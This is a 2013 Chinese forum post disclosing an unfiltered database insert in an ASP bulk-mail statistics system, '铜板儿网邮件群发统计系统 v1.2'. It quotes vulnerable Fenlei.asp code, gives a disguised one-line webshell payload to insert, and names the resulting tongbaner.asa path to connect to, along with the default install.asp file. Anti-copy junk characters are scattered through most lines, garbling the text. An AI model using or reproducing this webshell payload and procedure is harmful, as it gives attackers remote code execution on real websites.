找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1987|回复: 0
打印 上一主题 下一主题

铜板儿网邮件群发统计系统 v1.2 漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-14 20:14:57 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
'Fenlei.asp ! x, {* W7 J* N/ f

: F" L: N3 D" m9 P, FIF Request.QueryString("Action")="del" Then
$ [% F- q; N7 l% vID=Request.QueryString("ID")
" J- h$ U+ B5 q9 c. ]% l& F* MIF Countss ("tui","Fenlei",ID )<>0 then
2 R1 A9 e( J/ D5 l5 v; O'略
. u' s$ x- D' B/ p$ yIF Request.QueryString("Action")="Add" Then . _0 A* ]+ [. I* ?$ b
Tname=Request.Form("Typename")
1 t& f# w. C- F2 qSet Rs=Server.CreateObject("adodb.Recordset") 2 @! S: [( v* K, N$ Z) [0 r
Sql="Select * From Fenlei Order by id Desc "
! T  |& p" f5 P+ bRs.Open Sql,Conn,1,3 1 b) n, t! D5 C3 d" ?* O3 q
Rs.Addnew 4 _( U4 X# N( e$ }7 k. d
Rs("Typename")=Tname ! g0 t( I! H5 Q
'略
0 B  o6 g2 P8 m; N* z3 GSet Rs=Server.CreateObject("adodb.Recordset") + F  E, C$ V) d) B
Sql="Select * From Fenlei Order by id Desc " ) ?: m8 ?# E* c  i4 N
Rs.Open Sql,Conn,1,1
# O7 _/ K4 c- L  l* C'略 8 ~, ?5 P0 G. [
%>
; z0 {8 l5 A+ M2 H* C. c' E ( Q4 G* B8 g. k0 Z2 E
8 }; E5 B' T7 F  H8 w0 l
& h& L$ B2 W( ]9 T
没有过滤,直接写入数据库。$ ?2 x/ [3 I9 l1 {/ p
" k1 p! d" d" Q1 U# \3 B
利用方法:
% E: g  Q0 j: C$ ]
3 }! R6 M! W8 U; n. b8 [0 ]插入:┼攠數畣整爠煥敵瑳∨≡┩>( Y7 B% J# f- Y( E' H

5 S# N- m0 R% ^# }( h9 u# M 2 [% ?  W: m7 I6 H" |
连接: http://www.xxx.com/###tongbaner.asa , h. E" |% A1 z% E
'默认安装文件:
& c8 x, l5 K, l# u# j* a'install.asp) @2 U7 g& \0 H" P1 L( b5 [
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表